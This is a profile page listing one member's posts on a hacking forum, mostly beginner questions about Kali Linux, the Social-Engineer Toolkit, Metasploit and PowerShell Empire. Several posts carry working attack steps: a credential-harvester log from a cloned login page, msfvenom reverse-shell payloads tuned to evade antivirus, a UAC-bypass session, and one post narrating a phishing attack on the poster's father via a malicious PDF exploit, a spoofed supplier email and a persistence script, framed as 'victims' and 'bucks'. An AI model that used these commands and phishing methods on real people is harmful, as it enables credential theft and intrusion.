Jump to content

isaac_204

Active Members
  • Posts

    26
  • Joined

  • Last visited

Posts posted by isaac_204

  1. Okay so I reset the settings to default and I stopped apache2 and everything is working fine. However the reason I wanted to change the port from 80 to a different one is, because I can't port forward port 80 as it's blocked by my ISP. Also I don't mind how the URL looks since I'm just experimenting with  SET. So my question is how can I change the port the Credentials Harvester runs on to another one? I've already tried to change the port in the set.config file "WEB_PORT=443" and when I access the cloned site by typing in the URL bar "192.168.1.16:443" it loads normaly but when I type anything on the email or password field and press enter instead of getting the credentials I get this error in the terminal:

     

    The best way to use this attack is if username and password form
    fields are available. Regardless, this captures all POSTs on a website.
    [*] The Social-Engineer Toolkit Credential Harvester Attack
    [*] Credential Harvester is running on port 443
    [*] Information will be displayed to you as it arrives below:
    192.168.1.4 - - [17/Nov/2017 09:08:09] "GET / HTTP/1.1" 200 -
    [*] WE GOT A HIT! Printing the output:
    POSSIBLE USERNAME FIELD FOUND: __user=0
    PARAM: __a=1
    PARAM: __dyn=7AzHK4GgO649UrJxm2q3miWGey8jrWo466ES2Sq2i5U4e2O2K48jyRyUrxuF98qDKaxeUW2ei5pQ14DBxe6ohx3ypUb8uz8bo5aayrgS2m4o9EfEmCxK9geE84eCUmzpEowWCwk84e9xCWK6oc9oy6oswgE-2mbx-8K4uazrwjQEzyUWf-4Uy68sKbxqfyBgoUhyo947Ey
    PARAM: __req=1
    PARAM: __be=-1
    PARAM: __pc=PHASED:DEFAULT
    PARAM: __rev=3463961
    PARAM: lsd=AVqk3QFo
    [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.


    [*] WE GOT A HIT! Printing the output:
    PARAM: __a=1
    PARAM: __be=-1
    PARAM: __dyn=7AzHK4GgO649UrJxm2q3miWGey8jrWo466ES2Sq2i5U4e2O2K48jyRyUrxuF98qDKaxeUW2ei5pQ14DBxe6ohx3ypUb8uz8bo5aayrgS2m4o9EfEmCxK9geE84eCUmzpEowWCwk84e9xCWK6oc9oy6oswgE-2mbx-8K4uazrwjQEzyUWf-4Uy68sKbxqfyBgoUhyo947Ey
    PARAM: __pc=PHASED:DEFAULT
    PARAM: __req=2
    PARAM: __rev=3463961
    POSSIBLE USERNAME FIELD FOUND: __user=0
    PARAM: lsd=AVqk3QFo
    PARAM: ph=C3
    POSSIBLE USERNAME FIELD FOUND: q=[{"user":"0","page_id":"9ji6lu","posts":[["gk2_exposure",{"identifier":"AT4VyfQf3AxNUabC3SATM7_xd3xkC31NlKa_FXDE7lw97X0965wlsUibcquLjraBX7mXtYDQGZnGD-wbNL5JRq1O","hash":"AT69GYK4kJlcg4KX"},1510902488583,0],["script_path_change",{"source_path":null,"source_token":null,"dest_path":"/login.php","dest_token":"ad976420","impression_id":"104d7e83","cause":"load","referrer":""},1510902488591,0],["scuba_sample",{"int":{"clientWidth":1583,"clientHeight":940},"normal":{"view":"normal"},"_ds":"www_tinyview_port","_options":{"addBrowserFields":true}},1510902488649,0],["time_spent_bit_array",{"tos_id":"9ji6lu","start_time":1510902488,"tos_array":[505,0],"tos_len":9,"tos_seq":0,"tos_cum":7},1510902496587,0],["ods:ms.time_spent.qa.www",{"time_spent.bits.js_initialized":[1]},1510902496590,0]],"trigger":"ods:ms.time_spent.qa.www","send_method":"ajax"}]
    PARAM: ts=1510902496594
    [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

  2. Hello fellows! Once again I need your help :lol: ! I have a problem with the ports I'm using on the Social Engineering Toolkit. By default the Credentials Harvester runs on port 80 but I wanted to change the port to another one like 443 or 4444 etc. However when I change the port from the set.config file the Credentials Harvester doesn't work so I changed the port that apache2 was listening on to the same port the Creds Harvester was listening on and when I try to run it I get this message:

    The best way to use this attack is if username and password form
    fields are available. Regardless, this captures all POSTs on a website.
    [*] The Social-Engineer Toolkit Credential Harvester Attack
    [*] Credential Harvester is running on port 4444
    [*] Information will be displayed to you as it arrives below:
    [*] Looks like the web_server can't bind to 80. Are you running Apache?
    Do you want to attempt to disable Apache? [y/n]: 

     

    Also I enabled APACHE_SERVER in the set.config file. Can anybody enlighten me with their knowledge?!

    Thanks in advance!

  3. Thanks for the replies!


    /etc/apt/sources.list:

    #

    # deb cdrom:[Debian GNU/Linux 2017.1 _Kali-rolling_ - Official Snapshot amd64 LIVE/INSTALL Binary 20170416-02:08]/ kali-rolling contrib main non-free

    #deb cdrom:[Debian GNU/Linux 2017.1 _Kali-rolling_ - Official Snapshot amd64 LIVE/INSTALL Binary 20170416-02:08]/ kali-rolling contrib main non-free

  4. I have upgraded my Kali Rolling 2016.2 to Kali Rolling 2017.1 without a problem however the apt install command doesn't seem to work! I tried installing different tools that I know for sure that are included in metapackages like OpenVAS. I tried "apt-get install openvas" and "apt install openvas" but I always get the same message "Unable to find package ..."

     Does anyone  have any ideas? Thank in advance!

  5. I recently bought a Asus Laptop with FreeDOS and Im trying to install Windows 10 from a USB. I burnt the ISO image in my USB using Rufus then I entered the BIOS in my Asus laptop I enabled Legacy, disabled Secured Boot and put the USB first in the Boot order. However when I save and exit it boots into the free boot again, whatever I do it always boots into FreeDOS. I seriously need help. Any advice is very much appreciated!

  6. Yeah I have already port forwarded my router, however when using metasploit you create the payload and you put your WAN IP and then your local IP on the handler. The problem is that in Powershell Empire the stager and the listener share the same IP so either they both use the local IP or the WAN IP. That's what is confusing to me. Thank you for your time!

  7. How can someone use Powershell Empire for attacks over the internet? Do you need a server? Also can someone create a Veil-Evasion payload and then get a connection in Empire?

    It would be great if someone could use it outside of the network because Privilege Escalation is way easier than it is with Metasploit

    Furthermore are there any tools for Post-Exploitation other than Metasploit , Powersploit

    Any suggestions would be appreciated!

  8. Hello guys I ran into a problem trying to bypass the UAC on my Windows 7 machine. I used the bypassuac_vbs exploit but this is what happened. Thanks in advance!

     

    msf exploit(handler) > use exploit/windows/local/bypassuac_vbs 
    msf exploit(bypassuac_vbs) > show options

    Module options (exploit/windows/local/bypassuac_vbs):

       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       SESSION                   yes       The session to run this module on.


    Exploit target:

       Id  Name
       --  ----
       0   Automatic


    msf exploit(bypassuac_vbs) > set SESSION 1
    SESSION => 1
    msf exploit(bypassuac_vbs) > exploit -j
    [*] Exploit running as background job.

    [*] Started reverse TCP handler on 192.168.1.14:4444 
    msf exploit(bypassuac_vbs) > [+] Windows 7 (Build 7601, Service Pack 1). may be vulnerable.
    [*] UAC is Enabled, checking level...
    [*] 192.168.1.5 - Meterpreter session 1 closed.  Reason: Died
    [-] Exploit failed: Rex::TimeoutError Operation timed out.

  9. So I have Kali Rolling 2016.2 installed on VMware and I'm trying to port forward but the port does not open. My host's IP is 192.168.1.8 and when I go to my routers page and put that IP and the port I want to open etc it works okay however when I put the virtual's machine IP which is 192.168.1.7 it doesnt work. So port forwarding with my host's IP works however port forwarding with the vitrual machine IP doesnt. Any advice is much appreciated. Thanks in advance!

  10. Ok so I finally got it work....I fucked around a litle bit trying to figure out what was the problem and I finally got it to work I used another payload " windows/x64/meterpreter/_base64 or windows/x64/meterpreter/reverse_tcp" and I used /xor as encoder and shikata_ga_nai they both worked great on most of the antivirus....But ESET is a tough son of a gun....

  11. The first time I hacked someone was my dad because he wanted to check his security.This is how i did it.I visited my dads store and when i left i have taken a card wich had his email adress, his number etc and I cracked his Wifi and took his public ip.So when i got back home I started searching for new products that he might be intrested in so I created a PDF file using this code in msfconsole.

    However before i created the payload I did some vulnerbility scanning;

    nmap -sS -Pn (his public ip adress) and with this code I got the OS the open tcp ports etc.

    msf >use exploit/windows/fileformat/adobe_utilprintf

    Then I searched for suppliers.So I made a new email adress and I named with the name of a supplier.

    After the creation of the email adrees I named the pdf file;

    msf >set FILENAME newproducts.pdf

    msf >set PAYLOAD windows/meterpreter/reverse_tcp

    msf > LHOST=(My static public ip_

    msf >LPORT=(the open tcp port on his computer) of course i had port foward the port

    msf >exploit

    msf >use exploit/multi/handler

    msf >set PAYLOAD windows/meterpreter/reverse_tcp

    msf >set LPORT 4444

    msf >set LHOST (public ip)

    msf >exploit

    After I created the payload I used a code to send the email

    >sendEmail -t (my dads email) -f UncleJohns@gmail.com -s (a random ip adress) -u New Poducts -a /root/Desktop/NewProducts.pdf

    Then I wrote the Email and I hit Enter and Ctrl+D

    And then I ran a persistence script.Thats how i got my first bucks.Please tell me your story its fun hearing how pen testers exploit their victims

  12. Hey guys I have a problem that is bothering me for a long time now.I can't execute a meterpreter shell that I created in Kali Linux I click it and nothing happens.The code I used at the start was (msfvenom -p windows/meterpreter/reverse_tcp LHOST=my ip LPORT=445..etc and when I launched it on my laptop (windows 8.1) nothing happened it didn't open or anything and it didn't connect to my PC(Kali Linux).Another code that I have used is (msfvenom  -a x64 -p windows/meterpreter/reverse_tcp -e x64/xor  -i 30 -f exe LHOST....etc but that code doesn't work too.For both of the payloads I've used :

     
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST...
    set LPORT...
    exploit
     
    If you guys know what the problems is please reply because I don't seem to find it.Thank you in advance.
×
×
  • Create New...